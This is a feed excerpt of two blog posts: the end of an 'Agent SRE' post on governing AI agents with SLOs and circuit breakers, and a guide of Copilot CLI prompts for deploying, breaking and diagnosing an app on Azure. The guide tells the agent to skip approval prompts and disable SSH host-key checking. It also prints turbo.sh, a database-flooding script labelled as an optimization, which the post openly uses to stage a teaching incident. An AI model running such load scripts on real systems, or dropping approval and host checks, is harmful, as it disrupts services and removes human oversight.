&lt;P&gt;&lt;STRONG&gt;slo.safety_sli&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Fraction of agent actions within policy&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt; 0.99&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;slo.burn_rate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Rate at which error budget is consumed&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;gt; 2.0 (warn), &amp;gt; 5.0 (page)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;slo.error_budget_remaining&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Budget left for the SLO window&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt; 20%&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;circuit_breaker.state&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Current breaker state per agent&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;OPEN or HALF_OPEN&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;trust_score.ring&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Execution ring (privilege level)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Ring 3 (untrusted)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;health.status&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Aggregate health across all dimensions&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;degraded or unhealthy&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;If you are already running Grafana dashboards for your services, a governance dashboard for your agent fleet is a new data source and a new set of panels, not a new monitoring stack.&lt;/P&gt;
&lt;H2&gt;The SRE Mental Model for Agents: Four New Concepts&lt;/H2&gt;
&lt;P&gt;Everything in Agent SRE is built on the SRE mental model you already have, extended with four concepts that adapt traditional reliability thinking for autonomous systems:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 95.6481%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Traditional SRE&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Agent SRE Equivalent&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What Changes&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Latency SLI&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Safety SLI&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Correctness of *action*, not speed of *response*&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Error budget&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Autonomy budget&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Burns on policy violations, not just errors&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Circuit breaker&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Behavioral circuit breaker&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Opens on wrong *behavior*, not just failure codes&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Canary deployment&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Capability rollout&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Rolls out *scope*, not just code&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The governance insight is that error budgets work in both directions for agents. A service's error budget only decreases. An agent's autonomy is also a budget: it grows when the safety SLI is strong and shrinks when it degrades. The error budget mechanism becomes the operational mechanism for expanding and contracting agent autonomy in response to evidence, which is exactly what regulated industries and risk-averse enterprise teams need before they will trust an autonomous agent with consequential actions.&lt;/P&gt;
&lt;H2&gt;Getting Started with Agent SRE&lt;/H2&gt;
&lt;LI-CODE lang="powershell"&gt;pip install agent-sre&lt;/LI-CODE&gt;
&lt;P&gt;A minimal Agent SRE integration requires three things: a safety SLO definition, a circuit breaker, and a health check. The progressive delivery and chaos engineering features layer on top when you are ready for them.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_sre import SLO, ErrorBudget
from agent_sre.slo.indicators import TaskSuccessRate
from agent_sre.cascade.circuit_breaker import CircuitBreakerConfig, CircuitBreaker

# Step 1: Define your safety SLO
slo = SLO(
    name="production-safety",
    indicators=[TaskSuccessRate(target=0.99, window="24h")],
    error_budget=ErrorBudget(total=0.01, burn_rate_alert=2.0, burn_rate_critical=5.0),
)

# Step 2: Configure a circuit breaker
breaker_config = CircuitBreakerConfig(
    failure_threshold=5,
    recovery_timeout_seconds=60,
    half_open_max_calls=3,
)
breaker = CircuitBreaker(agent_id="my-agent", config=breaker_config)

# Step 3: Wire into your existing agent loop
async def governed_agent_loop(agent, task):
    # Check health first
    if not await agent_is_healthy(agent.id):
        return {"error": "agent suspended", "reason": "health check failed"}

    # Run within circuit breaker protection
    async with breaker:
        result = await agent.run(task)
        slo.record_event(good=result.policy_compliant)
        return result&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The quickstart in the repository walks through a complete setup with safety SLOs, circuit breakers, and a Prometheus dashboard export in under 50 lines.&lt;/P&gt;
&lt;H2&gt;Why This Matters&lt;/H2&gt;
&lt;P&gt;Most AI observability tools today focus on what you might call model quality: hallucination rate, latency, token cost, task completion. These are useful metrics. They are not SRE metrics. They do not answer whether the agent acted within its authorized scope, whether its behavioral error budget is burning at a dangerous rate, or whether it would survive the LLM provider going down.&lt;/P&gt;
&lt;P&gt;Agent SRE answers those questions using the operational vocabulary that SRE teams already understand: SLOs, error budgets, circuit breakers, chaos experiments, and health checks. The goal is not to replace your observability stack. It is to make agent governance visible inside it.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The reliability of an autonomous agent is not a property of the model. It is a property of the governance infrastructure around it.&lt;/STRONG&gt; Agent SRE is that infrastructure.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2&gt;Resources&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;GitHub:&lt;/STRONG&gt; &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank"&gt;github.com/microsoft/agent-governance-toolkit&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Install:&lt;/STRONG&gt; pip install agent-sre&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Tutorials:&lt;/STRONG&gt; &lt;A class="lia-external-url" href="https://microsoft.github.io/agent-governance-toolkit/tutorials/" target="_blank"&gt;40+ tutorials including dedicated Agent SRE walkthroughs for SLO setup, chaos experiments, and progressive delivery&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Architecture reference:&lt;/STRONG&gt; &lt;A class="lia-external-url" href="https://microsoft.github.io/agent-governance-toolkit/ARCHITECTURE/" target="_blank"&gt;ARCHITECTURE.md&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;OWASP compliance mapping:&lt;/STRONG&gt; OWASP-COMPLIANCE.md -- Agent SRE addresses ASI-08 (Cascading Failures) directly through circuit breakers and SLO-based fault detection&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Part 1&lt;/STRONG&gt; -- &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/agent-governance-toolkit-architecture-deep-dive-policy-engines-trust-and-sre-for/4510105" data-lia-auto-title="Runtime governance: Policy engines, trust, and SRE overview" data-lia-auto-title-active="0" target="_blank"&gt;Runtime governance: Policy engines, trust, and SRE overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Part 2&lt;/STRONG&gt; -- &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/shift-left-governance-for-ai-agents-how-the-agent-governance-toolkit-helps-you-c/4516481" data-lia-auto-title="Shift-left governance: Catching violations before production" data-lia-auto-title-active="0" target="_blank"&gt;Shift-left governance: Catching violations before production&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Part 3&lt;/STRONG&gt; -- &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/after-the-agent-acts-proving-what-happened-and-who-authorized-it/4519826" data-lia-auto-title="Post-hoc accountability: After the agent acts" data-lia-auto-title-active="0" target="_blank"&gt;Post-hoc accountability: After the agent acts&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;EM&gt;The Agent Governance Toolkit is an open-source project released under the MIT License. All features described in this post are available in the public repository. The `agent-sre` package is currently in public preview; APIs may change before general availability.&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;EM&gt;Questions about Agent SRE in your environment? Open an issue at &lt;A class="lia-external-url" href="http://aka.ms/agent-governance-toolkit" target="_blank"&gt;aka.ms/agent-governance-toolkit&lt;/A&gt; or start a discussion in the comments below.&lt;/EM&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 19 May 2026 23:12:29 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/applying-site-reliability-engineering-to-autonomous-ai-agents/ba-p/4521357</guid>
      <dc:creator>mosiddi</dc:creator>
      <dc:date>2026-05-19T23:12:29Z</dc:date>
    </item>
    <item>
      <title>Agentic AI for Linux Operations on Azure: The Prompts</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/agentic-ai-for-linux-operations-on-azure-the-prompts/ba-p/4520924</link>
      <description>&lt;H1&gt;Try This Yourself: Agentic AI for Linux Operations on Azure&lt;/H1&gt;
&lt;P&gt;At Red Hat Summit 2026, I handed GitHub Copilot CLI a terminal and asked it to deploy a full-stack application to RHEL 10 on Azure. Live. From a single prompt. No scripts, no runbooks, no pre-baked automation. The audience watched every command happen in real time and then played the app on their phones.&lt;/P&gt;
&lt;P&gt;This post gives you the prompts so you can try it yourself. Copy them, paste them into Copilot CLI, and watch what happens. The only things you need to change are marked with&amp;nbsp;[EDIT].&lt;/P&gt;
&lt;P&gt;When you're done, you'll have a working Conference Bingo game running on Azure that you can open in your browser and play. The same app that people played live at Summit.&lt;/P&gt;
&lt;H2&gt;What You Need&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure subscription&lt;/STRONG&gt;&amp;nbsp;— any subscription where you can create VMs (a free trial or Visual Studio subscription works)&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;GitHub Copilot CLI&lt;/STRONG&gt;&amp;nbsp;— see&amp;nbsp;&lt;A href="https://docs.github.com/en/copilot/how-tos/copilot-cli/set-up-copilot-cli/install-copilot-cli" target="_blank" rel="noopener"&gt;Installing Copilot CLI&lt;/A&gt;&amp;nbsp;for all platforms
&lt;UL&gt;
&lt;LI&gt;macOS/Linux:&amp;nbsp;brew install copilot-cli&amp;nbsp;or&amp;nbsp;curl -fsSL https://gh.io/copilot-install | bash&lt;/LI&gt;
&lt;LI&gt;Windows:&amp;nbsp;winget install GitHub.Copilot&amp;nbsp;or use the install script in WSL&lt;/LI&gt;
&lt;LI&gt;
&lt;P&gt;GitHub Copilot subscription — Individual, Business, or Enterprise (&lt;A class="lia-external-url" href="https://github.com/features/copilot" target="_blank"&gt;https://github.com/features/copilot&lt;/A&gt;)&lt;/P&gt;
&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;SSH key pair&lt;/STRONG&gt;&amp;nbsp;at&amp;nbsp;~/.ssh/id_rsa&amp;nbsp;— generate with&amp;nbsp;ssh-keygen&amp;nbsp;if you don't have one&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure CLI&lt;/STRONG&gt;&amp;nbsp;authenticated — run&amp;nbsp;az login&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;A Linux machine or WSL&lt;/STRONG&gt;&amp;nbsp;with Ansible installed (for Prompt 2 only)&lt;/LI&gt;
&lt;LI&gt;~30 minutes total&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Before You Start&lt;/H2&gt;
&lt;LI-CODE lang=""&gt;az login 
az account set --subscription "[EDIT] Your Subscription Name"&lt;/LI-CODE&gt;
&lt;P&gt;That's the only setup. Everything else is in the prompts.&lt;/P&gt;
&lt;H2&gt;Choose Your Linux Distribution&lt;/H2&gt;
&lt;P&gt;These prompts work with any Azure-endorsed Linux distribution. Pick one and use its image URN in Prompt 0:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Distribution&lt;/th&gt;&lt;th&gt;Image URN&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;RHEL 10&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;RedHat:RHEL:10-lvm-gen2:latest&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;RHEL 9&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;RedHat:RHEL:9-lvm-gen2:latest&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Ubuntu 24.04&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Canonical:ubuntu-24_04-lts:server:latest&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Azure Linux&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;&lt;EM&gt;Coming soon — check&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/endorsed-distros" target="_blank" rel="noopener"&gt;endorsed distros&lt;/A&gt;&amp;nbsp;for availability&lt;/EM&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;SUSE 15 SP6&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;SUSE:sles-15-sp6:gen2:latest&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;AlmaLinux 9&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;
&lt;P&gt;almalinux:almalinux-x86_64:9-gen2:latest&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Rocky Linux 9&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;
&lt;P&gt;ciq:rlc-plus:rocky9:latest&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Oracle Linux 10&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Oracle:Oracle-Linux:ol10-lvm-gen2:latest&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Debian 12&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Debian:debian-12:12-gen2:latest&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;Copilot adapts its package management (dnf&amp;nbsp;vs&amp;nbsp;apt&amp;nbsp;vs&amp;nbsp;zypper), firewall (firewalld&amp;nbsp;vs&amp;nbsp;ufw), and security configuration (SELinux vs AppArmor) to the distro automatically. That's the point.&lt;/P&gt;
&lt;P&gt;For the full list, see&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/endorsed-distros" target="_blank" rel="noopener"&gt;Azure endorsed Linux distributions&lt;/A&gt;.&lt;/P&gt;
&lt;H2&gt;Prompt 0: Create the Infrastructure&lt;/H2&gt;
&lt;P&gt;This creates two blank Linux VMs, networking, and firewall rules. Nothing gets installed. That's Prompt 1's job.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Copy and paste into Copilot CLI:&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Create a resource group called "copilot-demo" in eastus with a vnet (10.0.0.0/16, one subnet 10.0.1.0/24). Provision two Linux VMs — "demo-db" and "demo-app" — using image URN &lt;STRONG&gt;[EDIT] RedHat:RHEL:10-lvm-gen2:latest&lt;/STRONG&gt;, my ~/.ssh/id_rsa key, and Standard_B2s size. Add NSG rules on both VMs for port 22 (SSH), and on demo-app for ports 80 and 443. Don't SSH into anything — just create the resources and tell me the IPs.&lt;/P&gt;
&lt;P&gt;When you're done, create a file at ~/.copilot/demo-env.md with the VM public and private IPs, resource group name, SSH user (azureuser), and SSH key path. Include a note that the app uses nginx as the reverse proxy (not Apache). Include a 'Demo Behavior Instructions' section with these rules: run SSH/SCP as direct commands (not Invoke-Expression), let output stream visibly (no tail/head), use SCP + bash scripts for complex quoting, no approval prompts, and hardcode SSH flags inline (-o StrictHostKeyChecking=no).&lt;/P&gt;
&lt;P&gt;After writing demo-env.md, verify it by reading it back and confirming the IPs match the VMs you just created. Run "az vm list-ip-addresses --resource-group copilot-demo -o table" and compare. If they don't match, fix it immediately. This file is the source of truth for every subsequent prompt.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;What to expect:&lt;/STRONG&gt;&amp;nbsp;Copilot creates the resource group, VNet, subnet, two VMs, and NSG rules. It writes an environment file that subsequent prompts reference. ~5 minutes.&lt;/P&gt;
&lt;H2&gt;Prompt 1: Deploy the Application&lt;/H2&gt;
&lt;P&gt;This is the big one. One prompt deploys PostgreSQL, Nginx, a Flask app, firewall rules, security configuration, and TLS — all from scratch.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Copy and paste into Copilot CLI:&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Read ~/.copilot/demo-env.md for the environment, then:&lt;/P&gt;
&lt;P&gt;Configure and deploy the conference bingo game from https://github.com/karlabbott/conference-bingo to the demo-app VM. I have two fresh Linux VMs already running in the "copilot-demo" resource group: demo-db for PostgreSQL and demo-app for the app, on the same vnet. SSH key is ~/.ssh/id_rsa, user is azureuser.&lt;/P&gt;
&lt;P&gt;Deploy the app to /srv/conference-bingo to avoid SELinux home directory issues. Use nginx as the reverse proxy (as specified in the README), not the Apache configs in the deploy/ directory. Run commands individually over SSH. Configure the firewall to allow HTTP and HTTPS. If SELinux is enforcing, configure it appropriately. SCP a .sql file for PostgreSQL setup rather than inlining SQL through SSH. Install certbot via pip if you have a domain, otherwise use a self-signed certificate. Write secrets to ~/.config.env and copy to /etc/bingo.env for the systemd service. Use &lt;STRONG&gt;[EDIT] your-email@example.com&lt;/STRONG&gt; for certs.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;What to expect:&lt;/STRONG&gt;&amp;nbsp;Copilot SSHs into both VMs and handles everything — packages, database, app deployment, web server, security, TLS. ~10-15 minutes.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;What to watch for:&lt;/STRONG&gt;&amp;nbsp;How Copilot adapts to your distro. On RHEL, it uses&amp;nbsp;dnf, sets SELinux booleans like&amp;nbsp;httpd_can_network_connect, runs&amp;nbsp;initdb&amp;nbsp;for PostgreSQL, and configures&amp;nbsp;firewalld. On Ubuntu, it uses&amp;nbsp;apt, skips&amp;nbsp;initdb, and sets up&amp;nbsp;ufw. Same prompt, different execution path. When something fails, watch it read the error and adapt.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;When it finishes:&lt;/STRONG&gt; Open&amp;nbsp;https://&amp;lt;demo-app-public-ip&amp;gt;&amp;nbsp;in your browser (accept the self-signed certificate warning if you didn't use a domain). You should see Conference Bingo running — enter your name and play. This is the same app people played live on their phones at Red Hat Summit.&lt;/P&gt;
&lt;H2&gt;Prompt 2: Add Observability with Ansible&lt;/H2&gt;
&lt;P&gt;This demonstrates the "explore with Copilot, codify with Ansible" pattern. The monitoring stack is an Ansible playbook that deploys Azure Monitor Agent, Log Analytics, Data Collection Rules, and a Managed Grafana dashboard.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Prerequisites:&lt;/STRONG&gt; Ansible installed on Linux or WSL. On Windows, use WSL and prefix commands with&amp;nbsp;export PATH=$HOME/.local/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin.&amp;nbsp;&lt;EM&gt;(Note: You may have to adjust this prompt to tell GitHub Copilot where your Ansible is installed.)&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Copy and paste into Copilot CLI:&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Read ~/.copilot/demo-env.md for the environment, then:&lt;/P&gt;
&lt;P&gt;Clone https://github.com/karlabbott/wordblitz-monitoring-ansible, copy group_vars/all.yml.example to group_vars/all.yml, and fill it in using the subscription ID from "az account show", resource group copilot-demo, location eastus, the VM names and IPs from demo-env.md, and ssh_user azureuser. Use "demo-law" for law_name and "demo-grafana" for grafana_name.&lt;/P&gt;
&lt;P&gt;Install the azure.azcollection Ansible collection and its pip requirements, then run the playbook with:&lt;/P&gt;
&lt;P&gt;ANSIBLE_AZURE_AUTH_SOURCE=cli ansible-playbook -i localhost, site.yml&lt;/P&gt;
&lt;P&gt;Print the Grafana dashboard URL when done and update demo-env.md with the Grafana URL and Log Analytics Workspace resource ID.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;What to expect:&lt;/STRONG&gt;&amp;nbsp;The playbook creates Azure monitoring resources, installs AMA on both VMs, configures data collection, deploys a Grafana dashboard, and — importantly — deploys a script called&amp;nbsp;turbo.sh&amp;nbsp;to the database VM that creates a real performance problem for Prompt 3. ~8-10 minutes.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;What is turbo.sh?&lt;/STRONG&gt;&amp;nbsp;The playbook deploys this to simulate a production incident:&lt;/P&gt;
&lt;LI-CODE lang=""&gt; #!/bin/bash
 # Observability performance optimizations: stress-tests PostgreSQL to validate
 # monitoring pipeline throughput under sustained high-concurrency workloads.
 # Stop: sudo -u postgres psql -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE query LIKE '%turbo_perf%';"
 
 # Phase 1: 8 CPU-burner loops (cross joins)
 for i in $(seq 1 8); do
   while true; do
     sudo -u postgres psql -d conference_bingo -c \
       "/* turbo_perf */ SELECT count(*) FROM bingo_squares a CROSS JOIN bingo_squares b CROSS JOIN bingo_squares c CROSS JOIN bingo_squares d CROSS JOIN bingo_squares e;" &amp;gt; 
/dev/null 2&amp;gt;&amp;amp;1
   done &amp;amp;
 done
 
 # Phase 2: 25 connection hogs that sleep in a transaction
 for i in $(seq 1 25); do
   while true; do
     sudo -u postgres psql -d conference_bingo -c \
       "/* turbo_perf */ SELECT pg_sleep(5);" &amp;gt; /dev/null 2&amp;gt;&amp;amp;1
   done &amp;amp;
 done
 
 echo "Turbo perf test started: 8 cross-join loops + 25 connection workers"
 echo "Observability pipeline should show load within seconds"&lt;/LI-CODE&gt;
&lt;P&gt;It fires 8 parallel cross-join queries that saturate every CPU core on the database VM, plus 25 connection hogs that exhaust PostgreSQL's connection pool. The turbo ansible role further reduces max_connections to 30 to make the problem worse. The result: the app slows to a crawl. Try playing bingo now — you'll feel it.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Why Ansible matters here:&lt;/STRONG&gt;&amp;nbsp;Agents are non-deterministic — the same prompt might take different steps each time. That's fine for exploration. But when you need to reproduce this in staging, then production, then for the next team, you need determinism. The playbook is idempotent, repeatable, auditable. It's in git, it's reviewed in PRs, and it IS the documentation. You explore with Copilot, then codify with Ansible.&lt;/P&gt;
&lt;H2&gt;Prompt 3: Ask Copilot What's Wrong&lt;/H2&gt;
&lt;P&gt;The turbo script is already running from Prompt 2. Your app should be slow. Now ask Copilot to figure out why — from a symptom alone:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;My app feels really slow. Can you tell me why? Let's review before making any changes.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;That's it. One sentence plus a guardrail.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;What to expect:&lt;/STRONG&gt;&amp;nbsp;Copilot SSHs in, checks system load, examines running processes, finds the cross-join queries, reads&amp;nbsp;turbo.sh, reverse-engineers the attack, explains the root cause, and offers to kill the processes. ~2-3 minutes.&lt;/P&gt;
&lt;H2&gt;Prompt 4: Generate an Incident Postmortem&lt;/H2&gt;
&lt;P&gt;After fixing the issue, ask Copilot to document what happened — from the same conversation:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Write an incident postmortem for what just happened — root cause, impact, how you diagnosed it, how you resolved it, and a recommendation to prevent it from happening again. Save it as a Word document at ~/Desktop/incident-postmortem.docx using python-docx, and open it.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;What to expect:&lt;/STRONG&gt;&amp;nbsp;A formatted Word document with root cause analysis, timeline, remediation steps, and prevention recommendations. The full loop: build, monitor, break, fix, document — one session. ~30 seconds.&lt;/P&gt;
&lt;H2&gt;Cleanup&lt;/H2&gt;
&lt;LI-CODE lang=""&gt;az group delete --name copilot-demo --yes --no-wait&lt;/LI-CODE&gt;
&lt;H2&gt;What I Learned Doing This Live&lt;/H2&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;A well-crafted prompt replaces a 50-step runbook.&lt;/STRONG&gt;&amp;nbsp;Your intent is the source of truth. The agent figures out the steps.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Explore with Copilot, codify with Ansible.&lt;/STRONG&gt;&amp;nbsp;Copilot gets you to working fast. Ansible keeps it working forever.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Understanding comes before abstraction.&lt;/STRONG&gt;&amp;nbsp;Don't start with the playbook. Start with the exploration. The playbook comes after.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;The danger with AI isn't that machines think. It's that we stop thinking because the output looks fine.&lt;/STRONG&gt;&amp;nbsp;Always review. Understand the blast radius. Start in non-production.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;AI removes the scaffolding. What remains is judgment.&lt;/STRONG&gt;&amp;nbsp;Technical correctness and the instinct to know when something is wrong — that's what the tools cannot replace. And that's what made me stop worrying about being replaced by them.&lt;/LI&gt;
&lt;/OL&gt;
&lt;H2&gt;Resources&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Conference Bingo App:&lt;/STRONG&gt;&amp;nbsp;&lt;A class="lia-external-url" href="https://github.com/karlabbott/conference-bingo" target="_blank" rel="noopener"&gt;https://github.com/karlabbott/conference-bingo&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Monitoring Playbook:&lt;/STRONG&gt;&amp;nbsp;&lt;A class="lia-external-url" href="https://github.com/karlabbott/wordblitz-monitoring-ansible" target="_blank" rel="noopener"&gt;https://github.com/karlabbott/wordblitz-monitoring-ansible&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Interactive Walkthrough:&lt;/STRONG&gt;&amp;nbsp;&lt;A class="lia-external-url" href="https://summit.99b.org" target="_blank" rel="noopener"&gt;https://summit.99b.org &lt;/A&gt;&amp;nbsp;— the full talk with audio narration and demo videos&lt;/LI&gt;
